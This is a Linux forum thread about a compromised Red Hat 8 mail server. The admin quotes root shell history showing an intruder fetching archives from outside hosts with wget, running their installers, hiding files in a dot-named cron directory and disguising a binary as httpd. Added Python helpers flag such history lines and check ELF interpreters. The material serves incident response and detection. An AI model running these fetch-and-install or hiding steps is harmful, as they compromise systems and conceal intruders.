- 06-13-2005 #1 Just Joined! (Join Date: Jun 2005, Posts: 6)
SWAPD bad ELF interpreter
Hey folks,
Recently my linux box has started giving me a strange error (at least to me it's strange). Whenever I use /etc/init.d/<servicename> <start/stop/status> I get the following error before it goes ahead and does what it's supposed to:
sh: /usr/bin/(swapd): /lib/ld-linux.so.1: bad ELF interpreter: No such file or directory
Now I have not made any recent modifications to this box (that I can remember) and I believe I just started getting this error one day without any precursor activity on my part.
I looked for the /lib/ld-linux.so.1 file which I obviously could not find. I did find /lib/ld-linux.so.2 though.
Also, I use PUTTY to admin and I now notice all my softlinks are highlighted in RED, but they still seem to work. As you can tell, I'm just a part time admin so please excuse the technical ignorance.
Running rh 8, sendmail, apache, squirrelmail. It's a Mail server.
Everything seems to still be working, I'm just getting this error.
Scanning through the history of root commands I came across some commands I don't recognize as having entered them myself:
466 wget www.stadion.home.ro/muie.tgz
467 tar -zxvf muie.tgz
468 cd muie
469 ./install
and
473 wget www.stadion.home.ro/muie.tgz
474 tar -zxvf muie.tgz
475 cd muie
476 ./install
and
480 ifconfig -a
481 cd /var/spool
482 ls -la
483 cd cron
484 ls -la
485 mkdir crontabs
486 cd crontabs
487 mkdir ". "
488 cd ". "
489 crontabs
490 wget www.Icky.home.ro/mil2.tar
491 tar xvf mil2.tar
492 rm -rf mil2.tar
493 cd mil
494 ls -la
495 pico
496 vi muhrc
497 mv init httpd
498 export PATH:=PATH
499 export PATH=:PATH
500 httpd
I'm beginning to think I may have been hacked. Anyone have any input for me on how to resolve my issue, and perhaps put my fears to rest?
Going to look into these commands further as I just noticed this as I was typing this message.
Jz.
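A small triage helper for the kind of numbered root `history` dump quoted in the post above. This is an added example, not code from the poster or this thread: the sample lines are constructed to mirror the post (with a placeholder download host in place of the real one), and the rules only encode the indicators already visible in the thread, so an admin reviewing a history file can see at a glance which of those behaviours it contains.

```python
import re

# Constructed sample of a numbered root `history` dump, modelled on the lines
# quoted in the post above; the download host is a placeholder, not the real one.
SAMPLE_HISTORY = """\
  465 ls -la
  466 wget www.example.invalid/muie.tgz
  467 tar -zxvf muie.tgz
  468 cd muie
  469 ./install
  481 cd /var/spool
  485 mkdir crontabs
  487 mkdir ". "
  488 cd ". "
  497 mv init httpd
  498 export PATH=:PATH
  500 httpd
  501 tail /var/log/maillog
"""

# Indicator rules, each drawn from something visible in the thread: fetching an
# archive, unpacking it, a directory named only with dots and spaces, renaming a
# file to look like a system daemon, and tampering with PATH.
RULES = [
    ("download_archive",  re.compile(r"\b(wget|curl)\b.*\.(tgz|tar(\.gz)?|zip)\b")),
    ("unpack_archive",    re.compile(r"\btar\s+-?[xz]")),
    ("odd_dirname",       re.compile(r'\b(mkdir|cd)\s+"\s*\.+\s*"')),
    ("masquerade_rename", re.compile(r"\bmv\s+\S+\s+(httpd|sshd|crond|init)\b")),
    ("path_tamper",       re.compile(r"\bexport\s+PATH\b")),
]

HISTORY_LINE = re.compile(r"^\s*(\d+)\s+(.*)$")

def parse_history(text):
    """Turn numbered `history` output into (number, command) pairs."""
    return [(int(m.group(1)), m.group(2))
            for m in map(HISTORY_LINE.match, text.splitlines()) if m]

def triage_history(text):
    """Return (number, rule_name, command) for every line that matches a rule."""
    hits = []
    for number, cmd in parse_history(text):
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append((number, name, cmd))
    return hits

def summarize(hits):
    """Count matches per rule so a quick glance shows which behaviours appeared."""
    counts = {}
    for _, name, _ in hits:
        counts[name] = counts.get(name, 0) + 1
    return counts

if __name__ == "__main__":
    for number, name, cmd in triage_history(SAMPLE_HISTORY):
        print(f"{number:5d}  {name:18s} {cmd}")
    print(summarize(triage_history(SAMPLE_HISTORY)))
```

Run it against a saved copy of `~root/.bash_history` (piped through `cat -n` or the output of `history`) rather than the live file; the rules are deliberately narrow, so a clean history produces no hits and anything it does flag deserves a look in context.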
- 06-13-2005 #2 Linux Engineer (Join Date: Mar 2005, Posts: 1,431)
ld-linux.so.1 is usually just a symlink; if you type in this command we may find out what the link is supposed to point to, and if the target exists anymore at all (the symlinks usually get red if the targets can't be found):
Code:
ls -l /lib/ld*
- 06-13-2005 #3 Just Joined! (Join Date: Jun 2005, Posts: 6)
Well, I tried that and I get this:
-rwxr-xr-x 1 root root 87341 Sep 5 2002 /lib/ld-2.2.93.so
lrwxrwxrwx 1 root root 12 Sep 29 2004 /lib/ld-linux.so.2 -> ld-2.2.93.so
If I create a symbolic link of ld-linux.so.1 to point to ld-2.2.93.so everything goes kaput. I delete the link and I'm back to a functioning system with the error.
Ok, now, I have determined that I was definitely hacked. It looks like the slug installed some applications and was using my system to possibly hack other systems. I tgz'd the files that I found, that he apparently placed on my server. I'm not sure exactly what they do, but perhaps one of ya might be interested in helping me figure this out.
I'm guessing that something he installed improperly upgraded (or downgraded) my ld installation so that his programs would work. This probably causes my problems. When I list out the /lib directory I get a large amount of RED highlighted symlinks. Not sure what I should be doing at this point. I changed the root pw, and some other pws, disabled rsh (which I wasn't aware was enabled), only using ssh now. The box is behind a router with port forwarding so not sure how he got it other than through ssh anyway (there are other possible avenues through local Windows PC holes that I recently tightened down). It appears this attack happened in Apr, but just started doing things on Jun 1.
Gads... Any help appreciated.
Jz.
- 06-13-2005 #4 Just Joined! (Join Date: Jun 2005, Posts: 6)
Just one more note, all these RED highlighted symlinks that are showing up seem to work just fine, and for most all of these RED highlighted symlinks, the files they point to do exist.
Very strange. Any help appreciated.
Jz.
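An added example (not code from this thread or from any of the posters) that ties together the `ls -l /lib/ld*` suggestion in #2 and the red symlinks discussed in #3 and #4. The first function reads the PT_INTERP program header of an ELF executable, which is exactly the path the kernel tries to load before it reports "bad ELF interpreter", so you can see which interpreter a given binary is asking for and whether that file is actually present; the second lists the symlinks in a directory whose target is missing, so a red entry whose target does exist can be told apart from a real orphan. Everything it runs against is constructed in a temporary directory: the `swapd` and `okbin` files are minimal fake ELF images named for illustration, not the binaries on the poster's box, and the `ld-2.2.93.so` / `ld-linux.so.1.9.11` names are borrowed from the listings in the thread.

```python
import os
import struct
import tempfile

ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2
PT_INTERP = 3  # program header type that names the dynamic linker

def elf_interpreter_from_bytes(data):
    """Return the PT_INTERP path stored in an ELF image, or None if absent."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    endian = "<" if ei_data == 1 else ">"
    if ei_class == ELFCLASS64:
        e_phoff = struct.unpack_from(endian + "Q", data, 0x20)[0]
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 0x36)
        phdr_fmt = endian + "IIQQQQQQ"   # type, flags, offset, vaddr, paddr, filesz, memsz, align
    elif ei_class == ELFCLASS32:
        e_phoff = struct.unpack_from(endian + "I", data, 0x1C)[0]
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 0x2A)
        phdr_fmt = endian + "IIIIIIII"   # type, offset, vaddr, paddr, filesz, memsz, flags, align
    else:
        raise ValueError("unknown ELF class")
    for i in range(e_phnum):
        fields = struct.unpack_from(phdr_fmt, data, e_phoff + i * e_phentsize)
        if ei_class == ELFCLASS64:
            p_type, p_offset, p_filesz = fields[0], fields[2], fields[5]
        else:
            p_type, p_offset, p_filesz = fields[0], fields[1], fields[4]
        if p_type == PT_INTERP:
            return data[p_offset:p_offset + p_filesz].rstrip(b"\0").decode()
    return None

def check_interpreter(path):
    """Return (interp, exists): what exec would try to load, and whether it is there."""
    with open(path, "rb") as f:
        interp = elf_interpreter_from_bytes(f.read())
    return interp, (interp is not None and os.path.exists(interp))

def find_dangling_symlinks(directory):
    """Return (link, target) for every symlink in `directory` whose target is missing."""
    dangling = []
    for name in sorted(os.listdir(directory)):
        p = os.path.join(directory, name)
        if os.path.islink(p) and not os.path.exists(p):
            dangling.append((p, os.readlink(p)))
    return dangling

def build_test_elf(interp, elf_class=ELFCLASS64):
    """Construct a minimal little-endian ELF image whose only program header is a
    PT_INTERP naming `interp`. Not runnable; just enough for the parser above."""
    interp_bytes = interp.encode() + b"\0"
    n = len(interp_bytes)
    if elf_class == ELFCLASS64:
        ehsize, phentsize = 64, 56
        ident = ELF_MAGIC + bytes([ELFCLASS64, 1, 1]) + b"\0" * 9
        header = ident + struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0, ehsize, 0, 0,
                                     ehsize, phentsize, 1, 0, 0, 0)
        phdr = struct.pack("<IIQQQQQQ", PT_INTERP, 4, ehsize + phentsize, 0, 0, n, n, 1)
    else:
        ehsize, phentsize = 52, 32
        ident = ELF_MAGIC + bytes([ELFCLASS32, 1, 1]) + b"\0" * 9
        header = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, ehsize, 0, 0,
                                     ehsize, phentsize, 1, 0, 0, 0)
        phdr = struct.pack("<IIIIIIII", PT_INTERP, ehsize + phentsize, 0, 0, n, n, 4, 1)
    return header + phdr + interp_bytes

def demo():
    """Recreate the thread's situation in a scratch directory: a good ld-linux.so.2
    link, an orphaned ld-linux.so.1 link, and a fake 'swapd' that asks for the latter."""
    with tempfile.TemporaryDirectory() as lib:
        open(os.path.join(lib, "ld-2.2.93.so"), "wb").close()
        os.symlink("ld-2.2.93.so", os.path.join(lib, "ld-linux.so.2"))
        os.symlink("ld-linux.so.1.9.11", os.path.join(lib, "ld-linux.so.1"))  # target missing
        bad = os.path.join(lib, "swapd")
        good = os.path.join(lib, "okbin")
        with open(bad, "wb") as f:
            f.write(build_test_elf(os.path.join(lib, "ld-linux.so.1")))
        with open(good, "wb") as f:
            f.write(build_test_elf(os.path.join(lib, "ld-linux.so.2"), ELFCLASS32))
        return {
            "dangling": [os.path.basename(l) + " -> " + t for l, t in find_dangling_symlinks(lib)],
            "swapd_ok": check_interpreter(bad)[1],
            "okbin_ok": check_interpreter(good)[1],
        }

if __name__ == "__main__":
    print(demo())
```

On a real box, point `check_interpreter` at the binary named in the error and `find_dangling_symlinks` at `/lib`; a binary whose PT_INTERP names a file that was never part of the installed glibc (the box here only ships `ld-linux.so.2`) is a strong hint that the program was not built for or installed by that system.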
- 06-14-2005 #5 Linux Engineer (Join Date: Mar 2005, Posts: 1,431)
Maybe you can try installing an ld 1 version as well? Here's my output:
Code:
bash-2.05b$ ls -l /lib/ld*
-rwxr-xr-x 1 root root 95452 May 28 23:21 /lib/ld-2.3.4.so
lrwxrwxrwx 1 root root 18 Jun 4 05:22 /lib/ld-linux.so.1 -> ld-linux.so.1.9.11
-rwxr-xr-x 1 root root 22800 Jun 4 05:22 /lib/ld-linux.so.1.9.11
lrwxrwxrwx 1 root root 11 May 28 23:22 /lib/ld-linux.so.2 -> ld-2.3.4.so
BTW, about hackers, here's something you should read: http://www3.ca.com/securityadvisor/v...ln.aspx?ID=402
A vulnerability exists within the Linux run-time linker that allows an attacker with local user privileges to execute arbitrary code as "root". The vulnerability in question only affects ld.so 1.9.2 - earlier versions do not have the same vulnerability.